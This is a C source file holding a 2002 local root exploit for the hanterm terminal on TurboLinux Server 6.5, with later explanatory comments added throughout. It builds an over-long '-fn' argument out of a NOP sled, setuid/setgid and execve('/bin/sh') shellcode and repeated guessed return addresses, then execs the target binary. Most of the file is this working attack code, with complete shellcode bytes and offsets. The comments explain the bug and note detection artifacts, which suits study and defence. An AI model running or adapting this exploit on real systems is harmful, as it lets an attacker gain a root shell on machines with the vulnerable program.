
  1. /* hanterm_exp.c
  2.  *
  3.  * local exploit for hanterm
  4.  *  .. tested in TurboLinux Server 6.5 (Japan)
  5.  *
  6.  * thanks to my Japanese friend kaju(kaijyu)
  7.  * and Japanese hacker UNYUN.
  8.  *
  9.  *                  by xperc@hotmail.com
  10.  *                         2002/02/07
  11.  */
  12.  
  13. #include <stdio.h>
  14.  
/* Layout constants for the argument buffer built in main() (all
 * target-specific; the header says they were tuned against one
 * TurboLinux 6.5 build and will not transfer to other binaries).
 *
 * NOTE(review): memset/strncpy/strlen and execl are called below
 * without <string.h> / <unistd.h>; they resolve only through
 * implicit declarations, which C99 and later reject. */
#define NOP        0x90   /* x86 single-byte NOP used as filler for buf */
#define MAXBUF        88  /* size of buf[] in main() */
#define RETOFS        84  /* centre of the range that receives the guessed address */
#define SHELL_OFS     22  /* offset in buf where the payload bytes are copied */
#define ESP_OFS     -0xe38 /* signed delta applied to the caller's esp to guess the target's stack address */
  20.  
/* Return the current stack pointer (i386 only).
 *
 * The inline asm moves esp into eax and the function then falls off the
 * end without a return statement. For a non-void function that is
 * undefined behaviour; it "works" only because the i386 calling
 * convention returns integers in eax and the compiler happens not to
 * touch eax between the asm and the epilogue. GCC-style asm syntax;
 * does not build as 64-bit code. */
unsigned int get_esp()
{
    __asm__("mov %esp,%eax");
}
  25.  
/* Reproducer for a stack buffer overflow in hanterm's handling of the
 * "-fn" command-line argument (per the file header: local, tested on
 * TurboLinux Server 6.5). Builds an over-long font-name argument whose
 * bytes are: NOP filler, a payload at SHELL_OFS, and repeated copies of
 * a guessed stack address around RETOFS, then execs the target with it.
 *
 * Defensive reading: the vulnerable behaviour is the target copying an
 * unbounded argv string into a fixed stack buffer; the fix belongs in the
 * target (length checks / bounded copy), and the presence of a 0x90 run
 * followed by "/bin/sh" in an argv or log line is the observable artifact.
 *
 * Returns: never returns normally if execl succeeds (the process image is
 * replaced); falls off the end otherwise (implicit status; no error check
 * on execl). */
int main()
{
    /* x86 Linux payload. The byte sequence decodes as three int 0x80
     * system calls — the first two with al=0x17 and al=0x2e (setuid and
     * setgid numbers on 32-bit Linux) and ebx=0, then the classic
     * execve pattern; the trailing bytes 2f 62 69 6e 2f 73 68 00 spell
     * "/bin/sh". No zero byte occurs before the final terminator, so
     * strlen(shellcode) below is 55. */
    static char shellcode[]={
        0x31,0xc0,0x31,0xdb,0xb0,0x17,0xcd,0x80,
        0x31,0xc0,0x31,0xdb,0xb0,0x2e,0xcd,0x80,
        0xeb,0x18,0x5e,0x89,0x76,0x08,0x31,0xc0,
        0x88,0x46,0x07,0x89,0x46,0x0c,0xb0,0x0b,
        0x89,0xf3,0x8d,0x4e,0x08,0x8d,0x56,0x0c,
        0xcd,0x80,0xe8,0xe3,0xff,0xff,0xff,0x2f,
        0x62,0x69,0x6e,0x2f,0x73,0x68,0x00
    };
    unsigned int retadr;      /* guessed address in the target's stack */
    char buf[MAXBUF];         /* the argument passed after "-fn"; 88 bytes */
    int i;

    memset(buf,NOP,MAXBUF);   /* whole buffer starts as NOP filler */

    /* Derive the guess from this process's esp plus a fixed, build-specific
     * delta; relies on get_esp()'s undefined-behaviour return (see above). */
    retadr=get_esp()+ESP_OFS;
    /* %p expects a pointer; passing an unsigned int is a format/argument
     * mismatch (UB). %#x with the integer would be the matching form. */
    printf("Jumping address = %p\n",retadr);

    /* Write retadr as 4-byte little-endian words at buf[52..83]
     * (RETOFS-32 .. RETOFS+31); the last iteration is i=80, so every
     * store stays inside buf. */
    for(i=RETOFS-32;i<RETOFS+32;i+=4){
        buf[i]    =retadr&0xff;
        buf[i+1]=(retadr>>8)&0xff;
        buf[i+2]=(retadr>>16)&0xff;
        buf[i+3]=(retadr>>24)&0xff;
    }
    /* Copy exactly strlen(shellcode)=55 bytes (no NUL) to buf[22..76].
     * This range overlaps the address words written above; the later
     * write wins, so statement order here is load-bearing. */
    strncpy(buf+SHELL_OFS,shellcode,strlen(shellcode));
    /* Deliberately NOT NUL-terminated: the author found that terminating
     * the buffer (the commented-out line) broke the effect. Consequently
     * execl reads past the end of buf until it finds a zero byte on the
     * stack — an out-of-bounds read and undefined behaviour; what gets
     * passed is whatever happens to follow buf in this frame. */
    //buf[MAXBUF-1]='\0';       faint!:-(
    /* Hard-coded target path; buf is the value of the "-fn" option.
     * The return value of execl is not checked, so a missing binary or a
     * failed exec falls silently through to the end of main. */
    execl("/usr/bin/X11/hanterm","hanterm","-fn",buf,(char *)0);
}